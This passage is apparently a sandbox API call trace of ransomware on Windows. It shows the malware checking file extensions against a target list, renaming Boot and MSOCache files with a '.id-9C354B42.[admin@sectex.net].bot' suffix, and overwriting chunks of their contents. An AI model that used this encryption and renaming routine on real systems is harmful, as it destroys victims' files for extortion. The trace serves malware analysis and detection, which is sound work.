	[0032.986] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.986] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.986] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.986] lstrlenW (lpString=".doc") returned 4
	[0032.986] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.986] lstrlenW (lpString=".docx") returned 5
	[0032.986] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.987] lstrlenW (lpString=".pdf") returned 4
	[0032.987] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.987] lstrlenW (lpString=".xls") returned 4
	[0032.987] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.987] lstrlenW (lpString=".xlsx") returned 5
	[0032.987] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.987] lstrlenW (lpString=".ppt") returned 4
	[0032.987] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.987] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.987] lstrlenW (lpString=".zip") returned 4
	[0032.987] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.987] lstrlenW (lpString=".rar") returned 4
	[0032.987] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.987] lstrlenW (lpString=".bz2") returned 4
	[0032.987] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.987] lstrlenW (lpString=".7z") returned 3
	[0032.987] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.987] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.987] lstrlenW (lpString=".dbf") returned 4
	[0032.987] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.987] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.987] lstrlenW (lpString=".1cd") returned 4
	[0032.987] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.987] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.987] lstrlenW (lpString=".jpg") returned 4
	[0032.987] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.987] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.987] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.987] lstrlenW (lpString=".doc") returned 4
	[0032.987] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.987] lstrlenW (lpString=".docx") returned 5
	[0032.987] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.987] lstrlenW (lpString=".pdf") returned 4
	[0032.987] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.988] lstrlenW (lpString=".xls") returned 4
	[0032.988] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.988] lstrlenW (lpString=".xlsx") returned 5
	[0032.988] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.988] lstrlenW (lpString=".ppt") returned 4
	[0032.988] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.988] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.988] lstrlenW (lpString=".zip") returned 4
	[0032.988] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.988] lstrlenW (lpString=".rar") returned 4
	[0032.988] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.988] lstrlenW (lpString=".bz2") returned 4
	[0032.988] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.988] lstrlenW (lpString=".7z") returned 3
	[0032.988] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.988] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.988] lstrlenW (lpString=".dbf") returned 4
	[0032.988] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.988] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.988] lstrlenW (lpString=".1cd") returned 4
	[0032.988] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.988] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29
	[0032.988] lstrlenW (lpString=".jpg") returned 4
	[0032.988] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0032.988] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0032.988] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0032.988] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0032.989] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=94800) returned 1
	[0032.989] CloseHandle (hObject=0x178) returned 1
	[0032.989] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20
	[0032.989] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.989] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.989] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29
	[0032.989] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29
	[0032.989] lstrlenW (lpString=".doc") returned 4
	[0032.989] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0032.989] lstrlenW (lpString=".docx") returned 5
	[0032.989] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0032.989] lstrlenW (lpString=".pdf") returned 4
	[0032.989] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0032.989] lstrlenW (lpString=".xls") returned 4
	[0032.989] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0032.989] lstrlenW (lpString=".xlsx") returned 5
	[0032.989] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0032.989] lstrlenW (lpString=".ppt") returned 4
	[0032.989] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0032.989] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29
	[0032.989] lstrlenW (lpString=".zip") returned 4
	[0032.989] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0032.989] lstrlenW (lpString=".rar") returned 4
	[0032.989] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0032.989] lstrlenW (lpString=".bz2") returned 4
	[0032.990] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.990] lstrlenW (lpString=".7z") returned 3
	[0032.990] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.991] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=85056) returned 1
	[0032.991] CloseHandle (hObject=0x178) returned 1
	[0032.992] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20
	[0032.992] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.992] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.992] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=43600) returned 1
	[0032.992] CloseHandle (hObject=0x178) returned 1
	[0032.992] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20
	[0032.992] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.992] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.992] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=90192) returned 1
	[0032.992] CloseHandle (hObject=0x178) returned 1
	[0032.993] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20
	[0032.993] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.993] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.993] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=89152) returned 1
	[0032.993] CloseHandle (hObject=0x178) returned 1
	[0032.993] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20
	[0032.993] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.993] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0032.993] GetFileSizeEx (in: hFile=0x178, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=3694080) returned 1
	[0032.994] CloseHandle (hObject=0x178) returned 1
	[0032.994] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20
	[0032.994] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0032.994] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0033.493] GetFileSizeEx (in: hFile=0x198, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=70361744) returned 1
	[0033.493] CloseHandle (hObject=0x198) returned 1
	[0033.493] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020
	[0033.494] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.494] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0033.494] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198
	[0033.494] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0033.494] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.494] ReadFile (in: hFile=0x198, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.503] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.504] ReadFile (in: hFile=0x198, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.517] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0033.517] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.517] ReadFile (in: hFile=0x198, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.539] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.539] WriteFile (in: hFile=0x198, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0033.766] SetEndOfFile (hFile=0x198) returned 1
	[0033.766] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb474720
	[0033.766] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0033.766] WriteFile (in: hFile=0x198, lpBuffer=0xb474720*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb474720*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0033.767] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0033.767] WriteFile (in: hFile=0x198, lpBuffer=0xb474720*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb474720*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0033.767] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0033.767] WriteFile (in: hFile=0x198, lpBuffer=0xb474720*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb474720*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0033.769] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb474720 | out: hHeap=0x7d60000) returned 1
	[0033.769] CloseHandle (hObject=0x198) returned 1
	[0037.614] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0037.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.615] lstrlenW (lpString=".doc") returned 4
	[0037.615] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString=".docx") returned 5
	[0037.615] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0037.615] lstrlenW (lpString=".pdf") returned 4
	[0037.615] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString=".xls") returned 4
	[0037.615] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString=".xlsx") returned 5
	[0037.615] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0037.615] lstrlenW (lpString=".ppt") returned 4
	[0037.615] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.615] lstrlenW (lpString=".zip") returned 4
	[0037.615] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString=".rar") returned 4
	[0037.615] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString=".bz2") returned 4
	[0037.615] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0037.615] lstrlenW (lpString=".7z") returned 3
	[0037.615] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0037.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.615] lstrlenW (lpString=".dbf") returned 4
	[0037.615] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0037.615] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString=".1cd") returned 4
	[0037.616] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0037.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString=".jpg") returned 4
	[0037.616] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString=".doc") returned 4
	[0037.616] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString=".docx") returned 5
	[0037.616] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0037.616] lstrlenW (lpString=".pdf") returned 4
	[0037.616] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString=".xls") returned 4
	[0037.616] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString=".xlsx") returned 5
	[0037.616] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0037.616] lstrlenW (lpString=".ppt") returned 4
	[0037.616] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString=".zip") returned 4
	[0037.616] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString=".rar") returned 4
	[0037.616] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString=".bz2") returned 4
	[0037.616] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0037.616] lstrlenW (lpString=".7z") returned 3
	[0037.616] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0037.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString=".dbf") returned 4
	[0037.616] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0037.616] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.616] lstrlenW (lpString=".1cd") returned 4
	[0037.616] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0037.617] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72
	[0037.617] lstrlenW (lpString=".jpg") returned 4
	[0037.617] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0037.617] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0037.617] lstrlenW (lpString="OutlookMUI.msi") returned 14
	[0037.617] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198
	[0037.617] GetFileSizeEx (in: hFile=0x198, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=2865664) returned 1
	[0037.617] CloseHandle (hObject=0x198) returned 1
	[0037.617] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020
	[0037.617] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.617] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0037.618] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198
	[0037.618] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0037.618] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0037.618] ReadFile (in: hFile=0x198, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0037.895] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0037.895] ReadFile (in: hFile=0x198, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0037.924] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0037.924] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0037.924] ReadFile (in: hFile=0x198, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0037.939] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.939] WriteFile (in: hFile=0x198, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0037.958] SetEndOfFile (hFile=0x198) returned 1
	[0037.959] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb53b750
